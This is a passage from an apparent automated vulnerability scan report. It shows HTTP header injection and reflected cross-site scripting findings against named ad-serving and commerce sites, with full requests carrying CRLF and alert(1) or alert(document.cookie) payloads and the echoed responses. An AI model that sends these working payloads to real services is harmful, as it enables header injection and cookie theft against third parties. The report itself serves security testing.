Path:   /pfadx/csmonitor_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload f761f%0d%0a84ae002f268 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=false;position=1;ac17=1;ac16=1;ac14=1;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;sz=24x24;dcmt=text/html;ord=1295452268743?&f761f%0d%0a84ae002f268=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cim.meebo.com/cim/sandbox.php?lang=en&version=v89_cim_10_3_8&protocol=http%3A&network=csmonitor
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Access-Control-Allow-Origin: *
DCLK_imp: v7;x;214948934;0-0;0;58826896;24/24;31459665/31477541/1;;~aopt=2/0/ff/0;~okv=;secure=false;position=1;ac17=1;ac16=1;ac14=1;ac18=1;ic22=1;ac2=1;ac5=1;ic17=1;ic23=1;pc5=1;ac8=1;ic13=1;ic5=1;sz=24x24;dcmt=text/html;;f761f
84ae002f268
=1;~cs=i:
Date: Wed, 19 Jan 2011 17:59:50 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 367

DoubleClick.onAdLoaded('MediaAlert', {"impressionUrl": "http://ad.doubleclick.net/imp;v7;x;214948934;0-0;0;58826896;24/24;31459665/31477541/1;;~aopt=2/0/ff/0;~okv=;secure=false;position=1;ac17=1;ac16=
...[SNIP]...

3.3. http://ad.doubleclick.net/pfadx/csmonitor_cim/ [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/csmonitor_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload af523%0d%0ad8de1a54e2 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/csmonitor_cim/;secure=af523%0d%0ad8de1a54e2 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://cim.meebo.com/cim/sandbox.php?lang=en&version=v89_cim_10_3_8&protocol=http%3A&network=csmonitor
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Access-Control-Allow-Origin: *
Date: Wed, 19 Jan 2011 17:59:34 GMT
Expires: Wed, 19 Jan 2011 17:59:34 GMT
DCLK_imp: v7;x;44306;0-0;0;58826896;0/0;0/0/0;;~aopt=2/0/ff/0;~okv=;secure=af523
d8de1a54e2
;~cs=n:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a94/0/0/%2a/g;44306;0-0;0;58826896;783-50/50;0/0/0;;~aopt=2/0/ff/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3.4. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 99487%0d%0a1735d591256 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=99487%0d%0a1735d591256&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1099:99487
1735d591256
;expires=Thu, 20 Jan 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 18:00:54 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=533
Expires: Wed, 19 Jan 2011 18:09:47 GMT
Date: Wed, 19 Jan 2011 18:00:54 GMT
Connection: close
Content-Length: 2018

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',99487
1735
...[SNIP]...

3.5. http://livingsocial.com/deals/socialads_reflector [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://livingsocial.com
Path:   /deals/socialads_reflector

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fab80%0d%0a7b239144ac4 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /deals/socialads_reflectorfab80%0d%0a7b239144ac4 HTTP/1.1
Host: livingsocial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 19 Jan 2011 18:10:17 GMT
Content-Type: text/html
Content-Length: 178
Connection: close
Location: http://partners.livingsocial.com/deals/socialads_reflectorfab80
7b239144ac4


<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx</center>
</body>
</html>

4. Cross-site scripting (reflected)  previous  next
There are 364 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d6da"-alert(1)-"f1f4da902d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038&9d6da"-alert(1)-"f1f4da902d6=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:00:03 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 19 Jan 2011 18:00:03 GMT
Pragma: no-cache
Content-Length: 4636
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?9d6da"-alert(1)-"f1f4da902d6=1&Z=1x1&s=1603038&_salt=3571184072";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...

4.2. http://ads.gmodules.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.gmodules.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 125f6%0aalert(1)//47c7f0d831b was submitted in the url parameter. This input was echoed as 125f6
alert(1)//47c7f0d831b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayak2%2F728x90.xml125f6%0aalert(1)//47c7f0d831b&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBgKsxYCU3TenUF8qcqwGUz9mFBJbloLoB8IzKjxDAjbcBsNsGEAEYASCq9oUYOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgENd3d3LmxvY2FsLmNvbboBCTcyOHg5MF9hc8gBCdoBemh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmY3NzPWJhbm5lciZwPWxvY20uc3AmcG9zPTQmdD00JnN6PTcyOHg5MCZvcmQ9MTI5NTQ1OTcyNjE3MyZrPWxhdytvZmZpY2VzJmw9RGFsbGFzJTJDK1RY4AECuAIYyALmpc8XqAMB0QP5cQX6xDmFDPUDAAAAxMgEAQ%26num%3D1%26ggladgrp%3D10345345168030795840%26gglcreat%3D9988352204398423926%26sig%3DAGiWqtx_MMUhrwT9GMn6hHLnk8PZwdyM9g%26client%3Dca-pub-4103679352234073%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBgKsxYCU3TenUF8qcqwGUz9mFBJbloLoB8IzKjxDAjbcBsNsGEAEYASCq9oUYOABQm9vQugFgyYajh9SjgBCgAcSR-u4DsgENd3d3LmxvY2FsLmNvbboBCTcyOHg5MF9hc8gBCdoBemh0dHA6Ly93d3cubG9jYWwuY29tL2RhcnQvP2FnPVRydWUmY3NzPWJhbm5lciZwPWxvY20uc3AmcG9zPTQmdD00JnN6PTcyOHg5MCZvcmQ9MTI5NTQ1OTcyNjE3MyZrPWxhdytvZmZpY2VzJmw9RGFsbGFzJTJDK1RY4AECuAIYyALmpc8XqAMB0QP5cQX6xDmFDPUDAAAAxMgEAQ%26sigh%3Dc3WzeS_619k%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=1&up_rawquery=las%20vegas%20hotel%20promotions&up_city=Washington&up_region=US-DC&up_lat=38.90&up_long=-77.04\ HTTP/1.1
Host: ads.gmodules.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Wed, 19 Jan 2011 18:05:28 GMT
Expires: Wed, 19 Jan 2011 18:05:28 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayak2/728x90.xml125f6
alert(1)//47c7f0d831b
. HTTP error 400

4.3. http://ads.roiserver.com/tag.jsp [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842ab'%3balert(1)//40a370322b1 was submitted in the h parameter. This input was echoed as 842ab';alert(1)//40a370322b1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311&w=300&h=250842ab'%3balert(1)//40a370322b1 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:36 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250842ab';alert(1)//40a370322b1" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.4. http://ads.roiserver.com/tag.jsp [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a473c"%3balert(1)//5cda4ab509d was submitted in the pid parameter. This input was echoed as a473c";alert(1)//5cda4ab509d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311a473c"%3balert(1)//5cda4ab509d&w=300&h=250 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:28 GMT


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311a473c";alert(1)//5cda4ab509d&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.5. http://ads.roiserver.com/tag.jsp [w parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /tag.jsp

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b68a5'%3balert(1)//ef73ca3b12e was submitted in the w parameter. This input was echoed as b68a5';alert(1)//ef73ca3b12e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /tag.jsp?pid=2DFE311&w=300b68a5'%3balert(1)//ef73ca3b12e&h=250 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 382
Date: Wed, 19 Jan 2011 17:59:32 GMT
Connection: close


var myRand=parseInt(Math.random()*99999999);

var pUrl = "http://ads.roiserver.com/disp?pid=2DFE311&rand=" + myRand;

var strCreative=''
+ '<IFRAME SRC="'
+ pUrl
+ '" WIDTH="300b68a5';alert(1)//ef73ca3b12e" HEIGHT="250" MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#000000">
...[SNIP]...

4.6. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 56c1b<script>alert(1)</script>1d321066f7f was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=256c1b<script>alert(1)</script>1d321066f7f&c2=6035786&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:23 GMT
Date: Wed, 19 Jan 2011 17:59:23 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"256c1b<script>alert(1)</script>1d321066f7f", c2:"6035786", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.7. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 33c9b<script>alert(1)</script>7d5427cace2 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=33c9b<script>alert(1)</script>7d5427cace2&tm=919330 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:36 GMT
Date: Wed, 19 Jan 2011 17:59:36 GMT
Connection: close
Content-Length: 3581

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
r(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"33c9b<script>alert(1)</script>7d5427cace2", c16:"", r:""});

4.8. http://b.scorecardresearch.com/beacon.js [c2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 90558<script>alert(1)</script>0af258cd0b5 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=603578690558<script>alert(1)</script>0af258cd0b5&c3=6035786&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:24 GMT
Date: Wed, 19 Jan 2011 17:59:24 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"2", c2:"603578690558<script>alert(1)</script>0af258cd0b5", c3:"6035786", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.9. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 26bb2<script>alert(1)</script>dadffb12f82 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=6035786&c3=603578626bb2<script>alert(1)</script>dadffb12f82&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 26 Jan 2011 17:59:26 GMT
Date: Wed, 19 Jan 2011 17:59:26 GMT
Connection: close
Content-Length: 3587

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
